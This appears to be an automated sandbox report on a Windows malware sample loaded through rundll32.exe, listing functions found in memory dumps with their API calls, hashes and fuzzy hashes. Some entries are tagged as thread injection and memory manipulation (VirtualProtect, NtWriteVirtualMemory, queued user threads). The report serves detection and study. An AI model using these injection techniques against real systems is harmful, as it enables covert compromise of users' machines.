                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: H
                                                                                  • API String ID: 1029625771-2852464175
                                                                                  • Opcode ID: af339ca8fb1bdb443c65b5f34cc288c383d11c23e6bfa41b3006492691236aab
                                                                                  • Instruction ID: 743d56e8f53efa6ea8a44ed32d9c03662b2b5be282eb5cd8725fb2520697e97a
                                                                                  • Opcode Fuzzy Hash: af339ca8fb1bdb443c65b5f34cc288c383d11c23e6bfa41b3006492691236aab
                                                                                  • Instruction Fuzzy Hash: 22A1A230608F0A9FE715DF98D898666B3E1FB98305F08462FE84AC3261EF34D945CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DBBCA4, Relevance: 3.2, APIs: 2, Instructions: 202memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00DAD7E0: VirtualProtect.KERNELBASE ref: 00DAD813
                                                                                  • VirtualProtect.KERNELBASE ref: 00DBBDC2
                                                                                  • VirtualProtect.KERNELBASE ref: 00DBBDE5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 950124d88d23a561aac71dbacf1bc96c5ba35bc7ea2c6c16874dec8a5bc52678
                                                                                  • Instruction ID: 50cdf97edb3d84c4cbb10ec5fccc9ad22b61c6435d4d00a9c76eca1b3eb8346c
                                                                                  • Opcode Fuzzy Hash: 950124d88d23a561aac71dbacf1bc96c5ba35bc7ea2c6c16874dec8a5bc52678
                                                                                  • Instruction Fuzzy Hash: CC517C70618B09CFDB44EF29D889AA5B7E0FB58310F10456EE48EC3261DB74E941CB96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DB9370, Relevance: 3.1, APIs: 2, Instructions: 147COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • StrRChrA.KERNELBASE ref: 00DB93CE
                                                                                  • RtlAddVectoredContinueHandler.NTDLL ref: 00DB94C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ContinueHandlerVectored
                                                                                  • String ID:
                                                                                  • API String ID: 3758255415-0
                                                                                  • Opcode ID: 9362112fee9ad7024f1cada21a9f97ec611ea1340ee70af9d56cb3bcbf80f2bf
                                                                                  • Instruction ID: 611c9c0c4a29542d454060454f6b89b2c25cdb09c707651c2a25e13ef82f334e
                                                                                  • Opcode Fuzzy Hash: 9362112fee9ad7024f1cada21a9f97ec611ea1340ee70af9d56cb3bcbf80f2bf
                                                                                  • Instruction Fuzzy Hash: F941F83160CA49DFEB65EFA898682AAB7D1FB98311B54416ED447C3260DF38C843CB25
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DC9884, Relevance: 3.1, APIs: 2, Instructions: 106registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID:
                                                                                  • API String ID: 47109696-0
                                                                                  • Opcode ID: b8ad9ed2dab873ff8433587b92c30091288de6d333796638e7617921bfc5556c
                                                                                  • Instruction ID: b12bcf359e68a5dec821779e604c1dcace64d1bd0acd790e057bfa2168801c49
                                                                                  • Opcode Fuzzy Hash: b8ad9ed2dab873ff8433587b92c30091288de6d333796638e7617921bfc5556c
                                                                                  • Instruction Fuzzy Hash: 47316431618B1C8F9754EF68E89499AB3E1F798300B445A7EE15FC3215DF34D944CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DB8790, Relevance: 3.1, APIs: 2, Instructions: 101registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegQueryValueExA.KERNELBASE ref: 00DB87D3
                                                                                  • RegQueryValueExA.KERNELBASE ref: 00DB8857
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: d422b9543eec853d3bd2a9095986e12f6e1fc240a72a1fcc64ad4a2e98f33398
                                                                                  • Instruction ID: 8e0173fd51924e19a9603a5e2ca6036732de255f5efe5fa28814d16e0d506a17
                                                                                  • Opcode Fuzzy Hash: d422b9543eec853d3bd2a9095986e12f6e1fc240a72a1fcc64ad4a2e98f33398
                                                                                  • Instruction Fuzzy Hash: 0031D53160CB088FEB58EF18E4C96A6B3E1FBA8301F51452EE84AC3251DF34D841CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DB7314, Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3356406503-0
                                                                                  • Opcode ID: 32b1309e94cb88c0bfd55d5708309a216c1990809e1b297a98f9908f7531cb90
                                                                                  • Instruction ID: 011c3e23f10079067c5b7251552ff61736b389cd1af39b46dfab342a12433fe1
                                                                                  • Opcode Fuzzy Hash: 32b1309e94cb88c0bfd55d5708309a216c1990809e1b297a98f9908f7531cb90
                                                                                  • Instruction Fuzzy Hash: D521A430618B088FD758EF28E88966577E1FBA8311F25446EE89AC3361DB34DD41CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DC3A14, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateOpen
                                                                                  • String ID:
                                                                                  • API String ID: 436179556-0
                                                                                  • Opcode ID: 3045a727d588193b2caeebc6a9ce336b2dba51846389aaf45621cbdd53b36981
                                                                                  • Instruction ID: 2bf34f98ec17d8444757824d5aef395baefb2a7dd4523107bf2f39d5a006ed8c
                                                                                  • Opcode Fuzzy Hash: 3045a727d588193b2caeebc6a9ce336b2dba51846389aaf45621cbdd53b36981
                                                                                  • Instruction Fuzzy Hash: 2F01843061CA498FDB44EB5C9488B29F7E1FBAC315F14442EE88EC3260DA74C9458752
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DBFAD4, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueueThreadUser
                                                                                  • String ID:
                                                                                  • API String ID: 3600083758-0
                                                                                  • Opcode ID: 6ee91ad08121308be91f958084160060ae6e19dd136481cb6343f576b16d76db
                                                                                  • Instruction ID: 95507eb0e86706403826a6a34ef2c6946f11cac560b0c3fb58f7f468883a205b
                                                                                  • Opcode Fuzzy Hash: 6ee91ad08121308be91f958084160060ae6e19dd136481cb6343f576b16d76db
                                                                                  • Instruction Fuzzy Hash: D3015E31754E088FEB94EF2DE85DB79B7E2E7A8711704856AA40AC3260DF38DD418782
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DC5028, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: f9bae9e0bdd93042823327556d740cc65595436eca48a2376daa81d9f037e0d9
                                                                                  • Instruction ID: 01de0d2a1783d9aca2f9aca7057b17d5d4ba8ea70d067e9a18b6cdd8f95d356e
                                                                                  • Opcode Fuzzy Hash: f9bae9e0bdd93042823327556d740cc65595436eca48a2376daa81d9f037e0d9
                                                                                  • Instruction Fuzzy Hash: 72617770518F059FD754EF18E889B66B7E1FB68301B54462EE88AC3255DB34F880CBD6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DA549C, Relevance: 1.6, APIs: 1, Instructions: 107processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: 4b1297742507f9654b15d5a838ba5ce0d5845aa651fc884adb9eac90df9abffa
                                                                                  • Instruction ID: 93a6290ec86d433e9467f00399cb9226262fa9b44892cb86cc67b9c45ee962cf
                                                                                  • Opcode Fuzzy Hash: 4b1297742507f9654b15d5a838ba5ce0d5845aa651fc884adb9eac90df9abffa
                                                                                  • Instruction Fuzzy Hash: 2F314F7060CB088FDB54EF1C9489666B7E5FB99311F00466EE84DC3262DB30EC458B86
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DA231C, Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 215853bbebc7f714c0176e20fa1f6705de20d9476ad85716633c052fa7c1a6dc
                                                                                  • Instruction ID: f86ab93bd63421eedb0fc8663c9eb26fef6438e58b928a421f0076ecc1abe797
                                                                                  • Opcode Fuzzy Hash: 215853bbebc7f714c0176e20fa1f6705de20d9476ad85716633c052fa7c1a6dc
                                                                                  • Instruction Fuzzy Hash: 8031A4303186088BEB5AEF3DDCD597A73EAEBD9300344552DA547C3255DEB8D8058B61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DAA7D4, Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlDeleteBoundaryDescriptor.NTDLL ref: 00DAA876
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: BoundaryDeleteDescriptor
                                                                                  • String ID:
                                                                                  • API String ID: 3203483114-0
                                                                                  • Opcode ID: 73820ac6e7aedd73fd32158238ee42c8a997d8c6612961addbaef7e68cf9f3c5
                                                                                  • Instruction ID: 9caf24871234f81befdbd08d7f725c8051c947585d754862586c3cfb0d82e5a2
                                                                                  • Opcode Fuzzy Hash: 73820ac6e7aedd73fd32158238ee42c8a997d8c6612961addbaef7e68cf9f3c5
                                                                                  • Instruction Fuzzy Hash: E1219234718A0C4FEB98EF6DA84532977E1F799300B14852DE55FC3251DE28DC42C792
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DAD7E0, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: a17af73f97df0c82a43e7586eb3227405641a4301284392d55f929c14e1347f6
                                                                                  • Instruction ID: 96e1e0e1d2ecfea0d11c57fb2418304d926758acd5dca756152d058d30e18b4b
                                                                                  • Opcode Fuzzy Hash: a17af73f97df0c82a43e7586eb3227405641a4301284392d55f929c14e1347f6
                                                                                  • Instruction Fuzzy Hash: 3F11E63060CB098F9B14EF29E845425B3E6F799315710063DEC8FC3245EA34ED45CB96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DB6734, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00DC3A14: RegCreateKeyA.ADVAPI32 ref: 00DC3A37
                                                                                  • RegQueryValueExA.KERNELBASE ref: 00DB678A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 2711935003-0
                                                                                  • Opcode ID: 77cdeb7ec160b55a16230e76a1ab5e2e70236efd872a38e31f31aa2abee85eba
                                                                                  • Instruction ID: b768db8ea128cf69b83faebed83f1ad47d74b07469a84a4539923602c5f3932c
                                                                                  • Opcode Fuzzy Hash: 77cdeb7ec160b55a16230e76a1ab5e2e70236efd872a38e31f31aa2abee85eba
                                                                                  • Instruction Fuzzy Hash: 72214F30528B488FD750EF64D888B9AB7E0FB98305F50092DA48BC3650EBB8D645CB56
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DAACAC, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00DCC130: NtWriteVirtualMemory.NTDLL ref: 00DCC14F
                                                                                  • VirtualProtectEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00DAAD00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Virtual$MemoryProtectWrite
                                                                                  • String ID:
                                                                                  • API String ID: 1789425917-0
                                                                                  • Opcode ID: 565bd1a8b43458a523ea30914509e0f98191a33216538679a5eb35c2d0911002
                                                                                  • Instruction ID: b078369e5cca192e45533ace532fbd08360f3a07df063fb4e5e0ffbba35de651
                                                                                  • Opcode Fuzzy Hash: 565bd1a8b43458a523ea30914509e0f98191a33216538679a5eb35c2d0911002
                                                                                  • Instruction Fuzzy Hash: E9017C70618B088FCB48EF5CA0C5525B7E0FB9C310B44456EE94EC7256CB70DD45CB96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DCD0A4, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindCloseChangeNotification.KERNELBASE ref: 00DCD0F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFindNotification
                                                                                  • String ID:
                                                                                  • API String ID: 2591292051-0
                                                                                  • Opcode ID: e809e0a73d4204c7adabfcf8fa1b5ba3f669599cca068ab71fd695eab82b94b0
                                                                                  • Instruction ID: 400fb6e295b3c499e4b7face2d6c842ec55f87bde5198c402653b5b11aee55be
                                                                                  • Opcode Fuzzy Hash: e809e0a73d4204c7adabfcf8fa1b5ba3f669599cca068ab71fd695eab82b94b0
                                                                                  • Instruction Fuzzy Hash: F0F0EC31318B4A5BEB88DF6DD894B2A76E2EBD8202F44193DB54AC3251DB78C8454B42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DA386C, Relevance: 1.5, APIs: 1, Instructions: 237stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: lstrcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1534048567-0
                                                                                  • Opcode ID: cda7ee15d0ed800f6432580e816866debd22be49963250a16eccd940d9f44358
                                                                                  • Instruction ID: fd95732ccfc2604a2e4fc63b4cc3cf793b51e70f54687f615ac9ab9666652041
                                                                                  • Opcode Fuzzy Hash: cda7ee15d0ed800f6432580e816866debd22be49963250a16eccd940d9f44358
                                                                                  • Instruction Fuzzy Hash: 0661803061CB599FC768CF08D48597AB7E2FB9A714F14462EF4CA83211DB34E946CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Analysis Process: rundll32.exe PID: 6488 Parent PID: 5528 rundll32.exeCOMMON

                                                                                  Executed Functions

                                                                                  Function 000001E7A433F640, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationQueryToken$Close
                                                                                  • String ID: 0
                                                                                  • API String ID: 459398573-4108050209
                                                                                  • Opcode ID: f5895f5cec159cec64883b650c172f0a268582915eacc63c06442516161aa36d
                                                                                  • Instruction ID: b24975c3ae9b9df241915829b00620768bee675f6bf22e077dccdc9139daec88
                                                                                  • Opcode Fuzzy Hash: f5895f5cec159cec64883b650c172f0a268582915eacc63c06442516161aa36d
                                                                                  • Instruction Fuzzy Hash: 2841FA30218B888FE764EF29D88579EB7E1FBD9301F54492EE48EC3251DB359945CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001E7A4346B80, Relevance: 4.8, APIs: 3, Instructions: 297memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocCreateFreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 2341667014-0
                                                                                  • Opcode ID: f400db90b547cd876deae4f918f036170426a129d3192a9b6cb0266f0b9909ab
                                                                                  • Instruction ID: 3412dc312bf4b34c6755a69dd7981c8321b9fbd3eecbcbf27ddc3709a3467d78
                                                                                  • Opcode Fuzzy Hash: f400db90b547cd876deae4f918f036170426a129d3192a9b6cb0266f0b9909ab
                                                                                  • Instruction Fuzzy Hash: B6919B30608A498FF768EF29D8457EE77E5EB98301F14453EE84BC32E1EA79D8468741
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001E7A4345890, Relevance: 4.1, APIs: 2, Instructions: 1144synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateUser$MutexNameQueueThread
                                                                                  • String ID:
                                                                                  • API String ID: 2503873790-0
                                                                                  • Opcode ID: db72f500cb4375137250dc09fd218a16c329592276e667ceebb262ae2802a11d
                                                                                  • Instruction ID: 126421cda412bfc7294007442f08cf4b1be0cd5248db6dc1732d7a52490d360c
                                                                                  • Opcode Fuzzy Hash: db72f500cb4375137250dc09fd218a16c329592276e667ceebb262ae2802a11d
                                                                                  • Instruction Fuzzy Hash: B3829370618A488FF768EF28EC856ED77E1F794302F24453ED846D31E1EA399846CB85
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001E7A4371002, Relevance: 3.4, APIs: 2, Instructions: 357nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.848114153.000001E7A4371000.00000040.00000001.sdmp, Offset: 000001E7A4371000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2706961497-0
                                                                                  • Opcode ID: 4aca93b6883acf43f458e5379941300c1f3fda93ecd626414691268af2b0a5da
                                                                                  • Instruction ID: 51b8dad60858f87647de1a80c85c35b0063ecd03b67d2d9afdb321ac73dcb1d8
                                                                                  • Opcode Fuzzy Hash: 4aca93b6883acf43f458e5379941300c1f3fda93ecd626414691268af2b0a5da
                                                                                  • Instruction Fuzzy Hash: 49B1D43221CB884FEB64DE18C8817EDB3E1FB96310F58457DD5CAD7282F635A9468B42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001E7A4359B4C, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationProcessQuery
                                                                                  • String ID:
                                                                                  • API String ID: 1778838933-0
                                                                                  • Opcode ID: 535eaa1e8fa4e57c8457d3b97bc13a9891625e3889b775ada58f90c1645a05b3
                                                                                  • Instruction ID: 051861caef35122818a701e5889e6a59be71425b92946fcee5a70b876c907a75
                                                                                  • Opcode Fuzzy Hash: 535eaa1e8fa4e57c8457d3b97bc13a9891625e3889b775ada58f90c1645a05b3
                                                                                  • Instruction Fuzzy Hash: 9A01443061894D4FFBA4EF58D4C4A6977E5FB98305F48057D9806C7194D635D441C701
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001E7A435EC08, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueryValue
                                                                                  • String ID: ($(
                                                                                  • API String ID: 2711935003-222463766
                                                                                  • Opcode ID: aebbbd127d4d5bc710cf9a7e1be097ee6a9f73d84e0cac9d7a5cc9686012e21f
                                                                                  • Instruction ID: 2d94853b2cefcddd8a17f12d8d76ab753cd69973cca290ac66825456b3223f9d
                                                                                  • Opcode Fuzzy Hash: aebbbd127d4d5bc710cf9a7e1be097ee6a9f73d84e0cac9d7a5cc9686012e21f
                                                                                  • Instruction Fuzzy Hash: 9F315E355186888FF344DF54EC457AAB7E5FB88306F00053DE846D32E2EB7996458B02
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001E7A43617F8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: H
                                                                                  • API String ID: 1029625771-2852464175
                                                                                  • Opcode ID: af339ca8fb1bdb443c65b5f34cc288c383d11c23e6bfa41b3006492691236aab
                                                                                  • Instruction ID: cf0a77be9abef09bb48b4683d822209a3d9b585a53ce5bdc6235695e0b44b680
                                                                                  • Opcode Fuzzy Hash: af339ca8fb1bdb443c65b5f34cc288c383d11c23e6bfa41b3006492691236aab
                                                                                  • Instruction Fuzzy Hash: 89A1B630608B4A9FFB55DF58D8887AAB3E1FB98315F09462ED94AC3191EF35D841C782
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001E7A434BCA4, Relevance: 3.2, APIs: 2, Instructions: 202memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 950124d88d23a561aac71dbacf1bc96c5ba35bc7ea2c6c16874dec8a5bc52678
                                                                                  • Instruction ID: fa04db07ca8c9684d9c6c99028134c2557ded27d91bae5d0d0ebed721a1d9017
                                                                                  • Opcode Fuzzy Hash: 950124d88d23a561aac71dbacf1bc96c5ba35bc7ea2c6c16874dec8a5bc52678
                                                                                  • Instruction Fuzzy Hash: 9D619270618B498FE744EF18D8857A9B7E0FB98301F14417EE84ED72A1EB34E941CB86
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001E7A4349370, Relevance: 3.1, APIs: 2, Instructions: 147COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ContinueHandlerVectored
                                                                                  • String ID:
                                                                                  • API String ID: 3758255415-0
                                                                                  • Opcode ID: 9362112fee9ad7024f1cada21a9f97ec611ea1340ee70af9d56cb3bcbf80f2bf
                                                                                  • Instruction ID: 3875c81c48c6d6991e11d8ce2f0fa66223f52e7f290164614b6fb93f5cdaaaa5
                                                                                  • Opcode Fuzzy Hash: 9362112fee9ad7024f1cada21a9f97ec611ea1340ee70af9d56cb3bcbf80f2bf
                                                                                  • Instruction Fuzzy Hash: 6E51863160CA459FFB64EF74DC583EE76D1EB98316F64816E9846D32E1EA39C8428B01
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001E7A4347314, Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3356406503-0
                                                                                  • Opcode ID: 32b1309e94cb88c0bfd55d5708309a216c1990809e1b297a98f9908f7531cb90
                                                                                  • Instruction ID: 58a5d5797d9a6f22305627d27f12ec38301350cf31525e72d4ac66e4b9e18dbd
                                                                                  • Opcode Fuzzy Hash: 32b1309e94cb88c0bfd55d5708309a216c1990809e1b297a98f9908f7531cb90
                                                                                  • Instruction Fuzzy Hash: 29215331618A088FE754EF28EC4977977E1FB98311F15446EE85AC32A1EB74DD41CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001E7A4353A14, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateOpen
                                                                                  • String ID:
                                                                                  • API String ID: 436179556-0
                                                                                  • Opcode ID: 3045a727d588193b2caeebc6a9ce336b2dba51846389aaf45621cbdd53b36981
                                                                                  • Instruction ID: 728f5aa399febce6bd9c8ed732ec23eca47f336aa1e4d557f74f54d5c755203c
                                                                                  • Opcode Fuzzy Hash: 3045a727d588193b2caeebc6a9ce336b2dba51846389aaf45621cbdd53b36981
                                                                                  • Instruction Fuzzy Hash: D1118E3161CA458FEB84EB5CD48876DBBE1EBE8310F14046EE84AD32A0EA75C8408742
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000001E7A434FAD4, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueueThreadUser
                                                                                  • String ID:
                                                                                  • API String ID: 3600083758-0
                                                                                  • Opcode ID: 6ee91ad08121308be91f958084160060ae6e19dd136481cb6343f576b16d76db
                                                                                  • Instruction ID: 88723f999f7219f947dedfedcafa77743d84a515c5aa10946cdff84c35724422
                                                                                  • Opcode Fuzzy Hash: 6ee91ad08121308be91f958084160060ae6e19dd136481cb6343f576b16d76db
                                                                                  • Instruction Fuzzy Hash: 76015231758E088FEB94EF2DD85D77D77E2E798711B048569A409C32A0DF38DD418781
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

